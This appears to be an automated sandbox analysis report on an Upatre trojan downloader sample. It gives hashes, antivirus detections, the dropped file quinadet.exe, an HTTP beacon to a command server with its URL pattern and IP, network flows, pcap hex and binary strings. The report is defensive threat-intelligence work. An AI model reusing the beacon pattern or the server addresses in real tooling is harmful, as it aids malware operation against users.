Analysis Date2015-05-10 11:01:00
MD502fe80fd7ca65013b2d80a04d26b8314
SHA16c86ed9bfc8bcf6f3141bcace979927d591695de

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Sectioncode md5: 9ac0c3d847bc6dc3cb545f1df68fe029 sha1: 022f7359c9f6cb1995cca894e22d7c7f67e177d6 size: 2560
Section.data md5: 5d2bfff5cad1cfdf51c67ea0d028a8ab sha1: c79d86e5b981e14425253a66e39e1bb397a1e1b1 size: 11776
Section.rsrc md5: 4ff98c10abb8b000cd80aaf08a3cc334 sha1: d9131369a446c9ee9164ed12d42e5b97c0b9b930 size: 27136
Section.reloc md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.DAT md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Timestamp1997-10-28 22:08:58
PEhashb40a54967439991ab5828a5043375b38f7a2e249
IMPhashbb993a486057964d5a9655d0992159ef
AVAd-AwareTrojan.Agent.BJHJ
AVAlwil (avast)Trojan-gen:Win32:Trojan-gen
AVArcabit (arcavir)Trojan.Agent.BJHJ
AVAuthentiumW32/Upatre.E3.gen!Eldorado
AVAvira (antivir)TR/Crypt.Xpack.170501
AVBitDefenderTrojan.Agent.BJHJ
AVBullGuardTrojan.Agent.BJHJ
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)TrojanDwnldr.Upatre.MUE.A5
AVClamAVno_virus
AVDr. WebTrojan.Upatre.201
AVEmsisoftTrojan.Agent.BJHJ
AVEset (nod32)Win32/TrojanDownloader.Waski.F
AVFortinetW32/Upatre.FAAR!tr
AVFrisk (f-prot)no_virus
AVF-SecureTrojan.Agent.BJHJ
AVGrisoft (avg)Downloader.Agent2.BXRJ
AVIkarusEvilware.Outbreak
AVK7Riskware ( 0040eff71 )
AVKasperskyTrojan-Downloader.Win32.Upatre.fid
AVMalwareBytesTrojan.Upatre
AVMcafeeUpatre-FAAR!02FE80FD7CA6
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.BC
AVMicroWorld (escan)Trojan.Agent.BJHJ
AVPadvishno_virus
AVRisingno_virus
AVSophosMal/Upatre-R
AVSymantecDownloader.Upatre
AVTrend Microno_virus
AVTwisterTrojanDldr.Upatre.fid.tosj
AVVirusBlokAda (vba32)BScope.Malware-Cryptor.Hlux

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\tempB83F.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\quinadet.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\quinadet.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\quinadet.exe

Network Details:

DNSicanhazip.com
Type: A
104.130.28.231
DNSicanhazip.com
Type: A
23.253.254.67
DNSicanhazip.com
Type: A
166.78.246.145
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
HTTP GEThttp://81.7.109.65:13360/SATAS12/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Flows TCP192.168.1.1:1031 ➝ 104.130.28.231:80
Flows TCP192.168.1.1:1032 ➝ 81.7.109.65:13360
Flows TCP192.168.1.1:1033 ➝ 91.240.97.66:443
Flows TCP192.168.1.1:1034 ➝ 91.240.97.66:443
Flows TCP192.168.1.1:1035 ➝ 91.240.97.66:443
Flows TCP192.168.1.1:1036 ➝ 91.240.97.66:443
Flows TCP192.168.1.1:1037 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1038 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1039 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1040 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1041 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1042 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1043 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1044 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1045 ➝ 91.240.97.64:443
Flows TCP192.168.1.1:1046 ➝ 91.240.97.64:443
Flows TCP192.168.1.1:1047 ➝ 91.240.97.64:443
Flows TCP192.168.1.1:1048 ➝ 91.240.97.64:443
Flows TCP192.168.1.1:1049 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1050 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1051 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1052 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1053 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1054 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1055 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1056 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1057 ➝ 91.240.97.45:443
Flows TCP192.168.1.1:1058 ➝ 91.240.97.45:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b57 4f573634 29204170   NT 6.1;WOW64) Ap
0x00000060 (00096)   706c6557 65624b69 742f3533 372e3336   pleWebKit/537.36
0x00000070 (00112)   20284b48 544d4c2c 206c696b 65204765    (KHTML, like Ge
0x00000080 (00128)   636b6f29 0d0a486f 73743a20 6963616e   cko)..Host: ican
0x00000090 (00144)   68617a69 702e636f 6d0d0a43 61636865   hazip.com..Cache
0x000000a0 (00160)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000b0 (00176)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f534154 41533132 2f434f4d   GET /SATAS12/COM
0x00000010 (00016)   50555445 522d5858 58585858 2f302f35   PUTER-XXXXXX/0/5
0x00000020 (00032)   312d5350 332f302f 20485454 502f312e   1-SP3/0/ HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f35 2e302028 57696e64   ozilla/5.0 (Wind
0x00000050 (00080)   6f777320 4e542036 2e313b57 4f573634   ows NT 6.1;WOW64
0x00000060 (00096)   29204170 706c6557 65624b69 742f3533   ) AppleWebKit/53
0x00000070 (00112)   372e3336 20284b48 544d4c2c 206c696b   7.36 (KHTML, lik
0x00000080 (00128)   65204765 636b6f29 0d0a486f 73743a20   e Gecko)..Host: 
0x00000090 (00144)   38312e37 2e313039 2e36353a 31333336   81.7.109.65:1336
0x000000a0 (00160)   300d0a43 61636865 2d436f6e 74726f6c   0..Cache-Control
0x000000b0 (00176)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings
5&f,(&R?0
$7[|P.p
8Ni=%t
ACKMIOz
|ACKMIz
ACUIProviderInvokeUI
aL-xS-
AmpFactorToDB
</assembly>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
B.data
BmQueryBounds
BmRelease
BmSaveToStream
|CAKMIz
CheckNetDrive
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
ConnectDlgProc
CreatePipe
CryptUIDlgCertMgr
CryptUIDlgFreeCAContext
CryptUIDlgSelectCA
CryptUIDlgSelectCertificateA
CryptUIDlgSelectCertificateFromStore
CryptUIDlgSelectCertificateW
CryptUIDlgSelectStoreA
CryptUIDlgSelectStoreW
CryptUIDlgViewContext
CryptUIDlgViewCRLA
CryptUIDlgViewCRLW
CryptUIDlgViewCTLA
CryptUIDlgViewCTLW
CryptUIDlgViewSignerInfoA
CryptUIDlgViewSignerInfoW
CRYPTUI.dll
c?(!T?%
DefCreate
DefCreateFromClip
DefCreateFromFile
DefCreateFromTemplate
DefCreateInvisible
DefLoadFromStream
DibChangeData
DibClone
DibCopy
DibDraw
DibEnumFormat
,dmXrX?
DNSAPI.dll
DnsQuery_A
DnsQueryConfig
DnsQueryConfigAllocEx
DnsQueryConfigDword
DnsQueryExA
DnsQueryExUTF8
DnsQueryExW
DnsQuery_UTF8
DnsQuery_W
DnsRecordBuild_UTF8
DnsRecordBuild_W
DnsRecordCompare
DnsRecordCopyEx
DnsRecordListFree
DnsRecordSetCompare
DnsRecordSetCopyEx
DUserCastClass
DUserDeleteGadget
duser.DLL
:E;com;
EnumCalendarInfoW
ExitProcess
fmifs.dll
GetCommandLineA
GetCommState
GetOEMCP
GetVersionExW
GetWindowsDirectoryA
)gUWSg
&%h5KVDM
heio.h2\sbhtem3h\sys
IsRasmanProcess
i <XvQ^1|
/	Jz?a
kernel32.dll
,#kyaJ
lpk.dll
LpkEditControl
LpkGetCharacterPlacement
MprAdminInterfaceCreate
mprapi.dll
msvcrt.dll
olecli32.dll
>p0!HNa;
PdhCreateSQLTablesW
pdh.dll
PdhEnumLogSetNamesA
PdhEnumLogSetNamesW
PdhEnumMachinesA
PdhEnumMachinesHA
PdhEnumMachinesHW
PdhEnumMachinesW
PdhEnumObjectItemsA
PdhEnumObjectItemsHA
PdhEnumObjectItemsHW
PdhEnumObjectItemsW
PdhEnumObjectsA
PdhEnumObjectsHA
PdhEnumObjectsHW
PdhEnumObjectsW
PdhExpandCounterPathA
pstorec.dll
PStoreCreateInstance
qB=9l|*
quartz.dll
QueryDeviceInformation
QueryDosDeviceA
RasActivateRoute
RasActivateRouteEx
RasAddConnectionPort
RasAddNotification
RasAllocateRoute
RasBundleClearStatistics
RasBundleClearStatisticsEx
RasBundleGetPort
RasBundleGetStatistics
RasBundleGetStatisticsEx
RasCompressionGetInfo
RasCompressionSetInfo
RasConnectionEnum
RasConnectionGetStatistics
RasCreateConnection
RasDeAllocateRoute
RasDestroyConnection
RasDeviceConnect
rasman.dll
REGAPI.dll
RegBuildNumberQuery
RegCdCreateA
RegCdCreateW
RegCdDeleteA
RegCdDeleteW
RegCdEnumerateA
RegCdEnumerateW
RegCdQueryA
RegCdQueryW
RegCloseServer
RegConsoleShadowQueryA
RegConsoleShadowQueryW
RegDefaultUserConfigQueryA
RegDefaultUserConfigQueryW
.reloc
</requestedExecutionLevel>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false">
</requestedPrivileges>
<requestedPrivileges>
</security>
<security>
TaL]Au7
!This program cannot be run in DOS mode.
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
v_][_+
wx-zN+(s
YAfjrq
( _Y][SQ
Y][SQ3